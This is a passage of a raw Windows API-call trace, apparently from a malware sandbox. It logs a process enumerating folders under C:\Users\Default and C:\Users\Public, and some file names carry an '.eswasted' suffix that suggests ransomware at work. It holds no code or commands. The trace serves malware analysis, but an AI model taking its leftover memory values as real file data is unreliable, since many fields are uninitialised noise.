ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x30702f92, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x30702f92, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0072.017] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Start Menu\\*", lpFindFileData=0x717dd0 | out: lpFindFileData=0x717dd0*(dwFileAttributes=0x70b3c8, ftCreationTime.dwLowDateTime=0x1312050, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x0, dwReserved1=0x20, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0072.017] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717dd0 | out: hHeap=0x6d0000) returned 1 [0072.017] FindNextFileW (in: hFindFile=0x71ef90, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x30702f92, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x30702f92, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x30702f92, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0072.018] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Templates\\*", lpFindFileData=0x717dd0 | out: lpFindFileData=0x717dd0*(dwFileAttributes=0x70b3c8, ftCreationTime.dwLowDateTime=0x1312050, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x0, dwReserved1=0x20, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0072.018] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717dd0 | out: hHeap=0x6d0000) returned 1 [0072.018] FindNextFileW (in: hFindFile=0x71ef90, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0072.018] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Videos\\*", lpFindFileData=0x717dd0 | out: lpFindFileData=0x717dd0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x20, cFileName=".", cAlternateFileName="")) returned 0x71efd0 [0072.018] FindNextFileW (in: hFindFile=0x71efd0, lpFindFileData=0x717dd0 | out: lpFindFileData=0x717dd0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x20, cFileName="..", cAlternateFileName="")) returned 1 [0072.018] FindClose (in: hFindFile=0x71efd0 | out: hFindFile=0x71efd0) returned 1 [0072.018] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717dd0 | out: hHeap=0x6d0000) returned 1 [0072.018] FindNextFileW (in: hFindFile=0x71ef90, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 0 [0072.018] FindClose (in: hFindFile=0x71ef90 | out: hFindFile=0x71ef90) returned 1 [0072.018] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312620 | out: hHeap=0x6d0000) returned 1 [0072.018] FindNextFileW (in: hFindFile=0x1312fa0, lpFindFileData=0x707bc0 | out: lpFindFileData=0x707bc0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Default User", cAlternateFileName="DEFAUL~1")) returned 1 [0072.018] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default User\\*", lpFindFileData=0x717dd0 | out: lpFindFileData=0x717dd0*(dwFileAttributes=0x13125e8, ftCreationTime.dwLowDateTime=0x1312050, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x0, dwReserved1=0x20, cFileName="desktop.ini", cAlternateFileName="")) returned 0xffffffff [0072.019] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717dd0 | out: hHeap=0x6d0000) returned 1 [0072.019] FindNextFileW (in: hFindFile=0x1312fa0, lpFindFileData=0x707bc0 | out: lpFindFileData=0x707bc0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0072.019] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\*", lpFindFileData=0x717dd0 | out: lpFindFileData=0x717dd0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x20, cFileName=".", cAlternateFileName="")) returned 0x71ef90 [0072.019] FindNextFileW (in: hFindFile=0x71ef90, lpFindFileData=0x717dd0 | out: lpFindFileData=0x717dd0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x20, cFileName="..", cAlternateFileName="")) returned 1 [0072.019] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Desktop\\*", lpFindFileData=0x13125e8 | out: lpFindFileData=0x13125e8*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0a09a40, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb0a09a40, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71efd0 [0072.019] FindNextFileW (in: hFindFile=0x71efd0, lpFindFileData=0x13125e8 | out: lpFindFileData=0x13125e8*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0a09a40, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb0a09a40, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0072.019] FindClose (in: hFindFile=0x71efd0 | out: hFindFile=0x71efd0) returned 1 [0072.019] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x13125e8 | out: hHeap=0x6d0000) returned 1 [0072.019] FindNextFileW (in: hFindFile=0x71ef90, lpFindFileData=0x717dd0 | out: lpFindFileData=0x717dd0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x20, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0072.019] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\*", lpFindFileData=0x13125e8 | out: lpFindFileData=0x13125e8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71efd0 [0072.020] FindNextFileW (in: hFindFile=0x71efd0, lpFindFileData=0x13125e8 | out: lpFindFileData=0x13125e8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0072.020] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\My Music\\*", lpFindFileData=0x70b3c8 | out: lpFindFileData=0x70b3c8*(dwFileAttributes=0x736c48, ftCreationTime.dwLowDateTime=0x1312050, ftCreationTime.dwHighDateTime=0x3a0043, ftLastAccessTime.dwLowDateTime=0x4d005c, ftLastAccessTime.dwHighDateTime=0x4f0053, ftLastWriteTime.dwLowDateTime=0x610043, ftLastWriteTime.dwHighDateTime=0x680063, nFileSizeHigh=0x5c0065, nFileSizeLow=0x6c0041, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="ers\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST.eswasted", cAlternateFileName="䲼攦㇊猶ছⵆ槡᠁")) returned 0xffffffff [0072.020] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b3c8 | out: hHeap=0x6d0000) returned 1 [0072.020] FindNextFileW (in: hFindFile=0x71efd0, lpFindFileData=0x13125e8 | out: lpFindFileData=0x13125e8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3079b513, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0072.020] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\My Pictures\\*", lpFindFileData=0x70b3c8 | out: lpFindFileData=0x70b3c8*(dwFileAttributes=0x736c48, ftCreationTime.dwLowDateTime=0x1312050, ftCreationTime.dwHighDateTime=0x3a0043, ftLastAccessTime.dwLowDateTime=0x4d005c, ftLastAccessTime.dwHighDateTime=0x4f0053, ftLastWriteTime.dwLowDateTime=0x610043, ftLastWriteTime.dwHighDateTime=0x680063, nFileSizeHigh=0x5c0065, nFileSizeLow=0x6c0041, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="ers\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST.eswasted", cAlternateFileName="䲼攦㇊猶ছⵆ槡᠁")) returned 0xffffffff [0072.020] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b3c8 | out: hHeap=0x6d0000) returned 1 [0072.020] FindNextFileW (in: hFindFile=0x71efd0, lpFindFileData=0x13125e8 | out: lpFindFileData=0x13125e8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3079b513, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0072.020] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\My Videos\\*", lpFindFileData=0x70b3c8 | out: lpFindFileData=0x70b3c8*(dwFileAttributes=0x736c48, ftCreationTime.dwLowDateTime=0x1312050, ftCreationTime.dwHighDateTime=0x3a0043, ftLastAccessTime.dwLowDateTime=0x4d005c, ftLastAccessTime.dwHighDateTime=0x4f0053, ftLastWriteTime.dwLowDateTime=0x610043, ftLastWriteTime.dwHighDateTime=0x680063, nFileSizeHigh=0x5c0065, nFileSizeLow=0x6c0041, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="ers\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST.eswasted", cAlternateFileName="䲼攦㇊猶ছⵆ槡᠁")) returned 0xffffffff [0072.020] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b3c8 | out: hHeap=0x6d0000) returned 1 [0072.020] FindNextFileW (in: hFindFile=0x71efd0, lpFindFileData=0x13125e8 | out: lpFindFileData=0x13125e8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3079b513, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 0 [0072.020] FindClose (in: hFindFile=0x71efd0 | out: hFindFile=0x71efd0) returned 1 [0072.020] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x13125e8 | out: hHeap=0x6d0000) returned 1 [0072.020] FindNextFileW (in: hFindFile=0x71ef90, lpFindFileData=0x717dd0 | out: lpFindFileData=0x717dd0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28351f0f, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x20, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0072.021] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Downloads\\*", lpFindFileData=0x13125e8 | out: lpFindFileData=0x13125e8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28351f0f, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71efd0 [0072.021] FindNextFileW (in: hFindFile=0x71efd0, lpFindFileData=0x13125e8 | out: lpFindFileData=0x13125e8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28351f0f, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0072.021] FindClose (in: hFindFile=0x71efd0 | out: hFindFile=0x71efd0) returned 1 [0072.021] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x13125e8 | out: hHeap=0x6d0000) returned 1 [0072.021] FindNextFileW (in: hFindFile=0x71ef90, lpFindFileData=0x717dd0 | out: lpFindFileData=0x717dd0*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfdae6622, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xaee7d305, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x20, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0072.021] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Favorites\\*", lpFindFileData=0x13125e8 | out: lpFindFileData=0x13125e8*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfdae6622, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xaee7d305, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71efd0 [0072.021] FindNextFileW (in: hFindFile=0x71efd0, lpFindFileData=0x13125e8 | out: lpFindFileData=0x13125e8*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfdae6622, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xaee7d305, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0072.022] FindClose (in: hFindFile=0x71efd0 | out: hFindFile=0x71efd0) returned 1 [0072.022] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x13125e8 | out: hHeap=0x6d0000) returned 1 [0072.022] FindNextFileW (in: hFindFile=0x71ef90, lpFindFileData=0x717dd0 | out: lpFindFileData=0x717dd0*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28a29e5c, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a29e5c, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x20, cFileName="Libraries", cAlternateFileName="LIBRAR~1")) returned 1 [0072.022] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Libraries\\*", lpFindFileData=0x13125e8 | out: lpFindFileData=0x13125e8*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28a29e5c, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a29e5c, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71efd0 [0072.022] FindNextFileW (in: hFindFile=0x71efd0, lpFindFileData=0x13125e8 | out: lpFindFileData=0x13125e8*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28a29e5c, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a29e5c, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0072.022] FindClose (in: hFindFile=0x71efd0 | out: hFindFile=0x71efd0) returned 1 [0072.022] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x13125e8 | out: hHeap=0x6d0000) returned 1 [0072.022] FindNextFileW (in: hFindFile=0x71ef90, lpFindFileData=0x717dd0 | out: lpFindFileData=0x717dd0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28305c4e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x20, cFileName="Music", cAlternateFileName="")) returned 1 [0072.022] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Music\\*", lpFindFileData=0x13125e8 | out: lpFindFileData=0x13125e8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28305c4e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71efd0 [0072.022] FindNextFileW (in: hFindFile=0x71efd0, lpFindFileData=0x13125e8 | out: lpFindFileData=0x13125e8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28305c4e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0072.022] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\*", lpFindFileData=0x70b3c8 | out: lpFindFileData=0x70b3c8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8031a7b6, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName=".", cAlternateFileName="")) returned 0x71f010 [0072.025] FindNextFileW (in: hFindFile=0x71f010, lpFindFileData=0x70b3c8 | out: lpFindFileData=0x70b3c8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8031a7b6, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="..", cAlternateFileName="")) returned 1 [0072.025] FindClose (in: hFindFile=0x71f010 | out: hFindFile=0x71f010) returned 1 [0072.026] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b3c8 | out: hHeap=0x6d0000) returned 1 [0072.026] FindNextFileW (in: hFindFile=0x71efd0, lpFindFileData=0x13125e8 | out: lpFindFileData=0x13125e8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8031a7b6, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sample Music", cAlternateFileName="SAMPLE~1")) returned 0 [0072.026] FindClose (in: hFindFile=0x71efd0 | out: hFindFile=0x71efd0) returned 1 [0072.026] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x13125e8 | out: hHeap=0x6d0000) returned 1 [0072.026] FindNextFileW (in: hFindFile=0x71ef90, lpFindFileData=0x717dd0 | out: lpFindFileData=0x717dd0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x20, cFileName="Pictures", cAlternateFileName="")) returned 1 [0072.026] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\*", lpFindFileData=0x13125e8 | out: lpFindFileData=0x13125e8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71efd0 [0072.026] FindNextFileW (in: hFindFile=0x71efd0, lpFindFileData=0x13125e8 | out: lpFindFileData=0x13125e8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, 